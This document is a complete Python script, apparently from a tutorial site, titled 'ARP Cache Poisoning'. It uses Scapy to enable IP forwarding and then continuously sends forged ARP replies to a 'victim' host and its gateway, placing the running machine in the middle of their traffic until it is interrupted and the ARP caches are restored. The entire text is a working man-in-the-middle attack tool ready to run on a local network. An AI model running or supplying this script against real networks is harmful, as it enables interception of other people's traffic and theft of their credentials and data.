ARP Cache Poisoning

1. from scapy.all import Ether, ARP, srp, send
2. import argparse
3. import time
4. import os
5. import sys
6.  
7. def _enable_linux_iproute():
8. """
9. Enables IP route ( IP Forward ) in linux-based distro
10. """
11. file_path = "/proc/sys/net/ipv4/ip_forward"
12. with open(file_path) as f:
13. if f.read() == 1:
14. # already enabled
15. return
16. with open(file_path, "w") as f:
17. print(1, file=f)
18.  
19.  
20. def _enable_windows_iproute():
21. """
22. Enables IP route (IP Forwarding) in Windows
23. """
24. from services import WService
25. # enable Remote Access service
26. service = WService("RemoteAccess")
27. service.start()
28.  
29.  
30. def enable_ip_route(verbose=True):
31. """
32. Enables IP forwarding
33. """
34. if verbose:
35. print("[!] Enabling IP Routing...")
36. _enable_windows_iproute() if "nt" in os.name else _enable_linux_iproute()
37. if verbose:
38. print("[!] IP Routing enabled.")
39.  
40.  
41. def get_mac(ip):
42. """
43. Returns MAC address of any device connected to the network
44. If ip is down, returns None instead
45. """
46. ans, _ = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip), timeout=3, verbose=0)
47. if ans:
48. return ans[0][1].src
49.  
50.  
51. def spoof(target_ip, host_ip, verbose=True):
52. """
53. Spoofs `target_ip` saying that we are `host_ip`.
54. it is accomplished by changing the ARP cache of the target (poisoning)
55. """
56. # get the mac address of the target
57. target_mac = get_mac(target_ip)
58. # craft the arp 'is-at' operation packet, in other words; an ARP response
59. # we don't specify 'hwsrc' (source MAC address)
60. # because by default, 'hwsrc' is the real MAC address of the sender (ours)
61. arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at')
62. # send the packet
63. # verbose = 0 means that we send the packet without printing any thing
64. send(arp_response, verbose=0)
65. if verbose:
66. # get the MAC address of the default interface we are using
67. self_mac = ARP().hwsrc
68. print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))
69.  
70.  
71. def restore(target_ip, host_ip, verbose=True):
72. """
73. Restores the normal process of a regular network
74. This is done by sending the original informations
75. (real IP and MAC of `host_ip` ) to `target_ip`
76. """
77. # get the real MAC address of target
78. target_mac = get_mac(target_ip)
79. # get the real MAC address of spoofed (gateway, i.e router)
80. host_mac = get_mac(host_ip)
81. # crafting the restoring packet
82. arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac)
83. # sending the restoring packet
84. # to restore the network to its normal process
85. # we send each reply seven times for a good measure (count=7)
86. send(arp_response, verbose=0, count=7)
87. if verbose:
88. print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac))
89.  
90.  
91. if __name__ == "__main__":
92. parser = argparse.ArgumentParser(description="ARP spoof script")
93. parser.add_argument("target", help="Victim IP Address to ARP poison")
94. parser.add_argument("host", help="Host IP Address, the host you wish to intercept packets for (usually the gateway)")
95. parser.add_argument("-v", "--verbose", action="store_true", help="verbosity, default is True (simple message each second)")
96. args = parser.parse_args()
97. target, host, verbose = args.target, args.host, args.verbose
98.  
99. enable_ip_route()
100. try:
101. while True:
102. # telling the `target` that we are the `host`
103. spoof(target, host, verbose)
104. # telling the `host` that we are the `target`
105. spoof(host, target, verbose)
106. # sleep for one second
107. time.sleep(1)
108. except KeyboardInterrupt:
109. print("[!] Detected CTRL+C ! restoring the network, please wait...")
110. restore(target, host)
111. restore(host, target)